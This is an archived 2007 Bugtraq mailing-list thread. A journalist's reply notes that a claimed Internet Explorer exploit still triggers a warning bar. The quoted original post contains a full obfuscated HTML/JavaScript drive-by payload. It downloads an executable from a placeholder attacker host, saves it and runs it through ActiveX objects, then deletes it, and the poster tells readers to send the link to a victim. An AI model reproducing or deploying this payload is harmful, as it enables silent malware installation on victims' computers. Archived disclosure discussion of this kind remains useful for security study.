lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <0273B67044957C41BD71D12EBA2E00AE1A1FB2@becca.LarrySeltzer.local>
Date: Mon, 30 Jul 2007 17:55:54 -0400
From: "Larry Seltzer" <Larry@...ryseltzer.com>
To: <RaeD@...Mail.Com>, <bugtraq@...urityfocus.com>
Subject: RE: Exploit In Internet Explorer

I get the browser warning bar: "This web site wants to run the following
add-on: 'Microsoft Data Access - Remote Data Services Dat...' from
'Microsoft Corporation'. If you trust the web site and the add-on and
want to allow it to run, click here..."

Looks like a message to me.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.eweek.com/cheap_hack/
Contributing Editor, PC Magazine
larryseltzer@...fdavis.com 

-----Original Message-----
From: RaeD@...Mail.Com [mailto:RaeD@...Mail.Com] 
Sent: Sunday, July 29, 2007 4:58 AM
To: bugtraq@...urityfocus.com
Subject: Exploit In Internet Explorer

Discovred By : Hasadya Raed
Contact : RaeD@...Mail.Com - Israel
-----------------------------------
Now You Can To Download Exe Files And To Run Without Msgs :

Exploit : 

<html>
<script>
var dc=document.write;
var sc=String.fromCharCode;
var exe="http://www.Attacker.com/sever.exe";
dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,4
4,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) +
exe +
sc(34,59,122,104,97,110,61,34,119,105,110,46,101,120,101,34,59,99,109,10
0,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,1
14,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,1
16,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,5
9,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,10
5,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105
,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,5
1,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,6
1,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101
,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,7
6,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32
,108,110,61,34,65,100,111,34,59,118,97,114,32,1
 
08,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,1
01,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,10
0,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,1
22,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,4
6,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59,
120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,5
9,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,4
6,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101,
66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40
,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97
,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,9
8,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,11
6,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,10
8,69,120,101,99,117,116,101,40,122,104,97,110,44,34,3
 
4,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,8
3,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34,
32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,1
10,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40
,101,41,123,125,59,60,47,115,99,114,105,112,116,62));
;By Fox TeaM
</script>
</html>

-------------------------------------------------
Save As Html File , And Send The Link To Victim
-------------------------------------------------

By Hasadya Raed - Israel 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ